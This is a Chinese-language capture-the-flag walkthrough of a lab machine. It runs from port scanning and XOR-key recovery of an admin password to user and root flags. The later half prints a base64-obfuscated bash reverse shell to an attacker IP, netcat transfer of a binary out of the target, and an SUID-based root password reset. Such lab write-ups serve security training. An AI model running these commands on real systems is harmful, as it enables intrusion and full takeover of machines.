靶机地址：192.168.31.132

使用nmap扫描靶机开放的端口

nmap -A -p 1-65535 192.168.31.132

发现443端口存在DNS解析,在hosts文件中添加DNS解析

收集earth.local信息

发现Previous Messages

37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

扫描earth.local目录


收集terratest.earth.local信息

扫描terratest.earth.local目录

发现robots文件，查看

发现有个testingnotes文件,尝试 fuzz 发现是 testingnotes.txt

文件内容的大致意思是采用 XOR，testdata.txt 内容是加密的密钥，terra 是用户名

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

CyberChef 解密,密码为重复的内容earthclimatechangebad4humans

在earth.local/admin/login登录，用户terra，密码earthclimatechangebad4humans

find命令查找flag

发现/var/earth_web/user_flag.txt路径下的flag文件，cat命令查看文件内容

构造反弹shell

echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjEzMC84ODg4IDA+JjEnCg== | base64 -d | bash

kali监听

nc -lvnp 8888

提权

find / -perm -u=s -type f 2>/dev/null

有一个 reset_root 文件，执行一下

报错，利用 nc 传输到 kali 本地进行分析

nc -lvp 8888 > reset_root

靶机命令

cat /usr/bin/reset_root | nc 192.168.31.130 8888

利用file查看文件属性

file reset_root

发现是Linux可执行文件

ltrace ./reset_root

发现这几个文件不存在，在靶机上手动创建这几个文件

再次执行reset_root

root用户的密码已被重置为Earth

取得root权限，查看flag